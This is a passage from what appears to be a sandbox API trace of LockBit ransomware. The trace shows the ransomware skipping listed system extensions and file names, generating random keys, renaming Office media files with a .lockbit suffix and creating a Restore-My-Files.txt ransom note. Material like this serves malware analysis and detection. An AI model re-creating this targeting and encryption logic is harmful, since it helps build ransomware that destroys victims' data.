lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.307] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14997_.GIF") returned 1 [0209.307] lstrcmpiW (lpString1="ntldr", lpString2="BD14997_.GIF") returned 1 [0209.307] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14997_.GIF") returned 1 [0209.307] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14997_.GIF") returned 1 [0209.307] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14997_.GIF") returned -1 [0209.307] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14997_.GIF") returned 1 [0209.307] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14997_.GIF") returned 1 [0209.307] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.307] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF") returned=".GIF" [0209.307] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.308] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.308] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.308] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF.lockbit") returned 76 [0209.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14997_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0209.309] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.310] malloc (_Size=0x40068) returned 0x3df0008 [0209.310] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=686) returned 1 [0209.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.310] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0209.310] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.311] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0209.311] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0209.311] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.311] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.312] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.314] free (_Block=0x1fa2ed8) [0209.314] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14997_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.314] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.314] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81af7a00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca82e00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x81af7a00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x220, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15034_.GIF", cAlternateFileName="")) returned 1 [0209.314] lstrcmpiW (lpString1=".", lpString2="BD15034_.GIF") returned -1 [0209.314] lstrcmpiW (lpString1="..", lpString2="BD15034_.GIF") returned -1 [0209.314] PathFindExtensionW (pszPath="BD15034_.GIF") returned=".GIF" [0209.314] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.314] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.314] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.314] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.314] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.315] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.315] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.316] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.316] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15034_.GIF") returned 1 [0209.316] lstrcmpiW (lpString1="ntldr", lpString2="BD15034_.GIF") returned 1 [0209.316] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15034_.GIF") returned 1 [0209.316] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15034_.GIF") returned 1 [0209.316] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15034_.GIF") returned -1 [0209.316] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15034_.GIF") returned 1 [0209.316] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15034_.GIF") returned 1 [0209.316] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.317] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF") returned=".GIF" [0209.317] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.317] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.317] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.317] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF.lockbit") returned 76 [0209.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15034_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0209.318] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.318] malloc (_Size=0x40068) returned 0x1ff1e60 [0209.318] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=544) returned 1 [0209.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0209.319] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0209.319] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.320] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.320] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.320] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0209.321] free (_Block=0x1fa2ed8) [0209.321] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15034_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.321] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.321] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0209.321] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81af7a00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcaa8f60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x81af7a00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x16e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD15035_.GIF", cAlternateFileName="")) returned 1 [0209.321] lstrcmpiW (lpString1=".", lpString2="BD15035_.GIF") returned -1 [0209.321] lstrcmpiW (lpString1="..", lpString2="BD15035_.GIF") returned -1 [0209.321] PathFindExtensionW (pszPath="BD15035_.GIF") returned=".GIF" [0209.321] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0209.322] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0209.322] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0209.323] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0209.323] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0209.323] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD15035_.GIF") returned 1 [0209.323] lstrcmpiW (lpString1="ntldr", lpString2="BD15035_.GIF") returned 1 [0209.323] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD15035_.GIF") returned 1 [0209.323] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD15035_.GIF") returned 1 [0209.323] lstrcmpiW (lpString1="autorun.inf", lpString2="BD15035_.GIF") returned -1 [0209.323] lstrcmpiW (lpString1="thumbs.db", lpString2="BD15035_.GIF") returned 1 [0209.323] lstrcmpiW (lpString1="iconcache.db", lpString2="BD15035_.GIF") returned 1 [0209.324] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0209.324] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF") returned=".GIF" [0209.324] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0209.324] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0209.324] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0209.325] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0209.325] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0209.325] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0209.325] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF.lockbit") returned 76 [0209.325] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15035_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0209.326] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0209.326] malloc (_Size=0x40068) returned 0x3d70450 [0209.326] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=366) returned 1 [0209.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0209.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0209.327] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.359] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.359] malloc (_Size=0xae) returned 0x1fa2ed8 [0209.359] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0209.359] free (_Block=0x1fa2ed8) [0209.359] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15035_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0209.359] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0209.359] CreateFileW 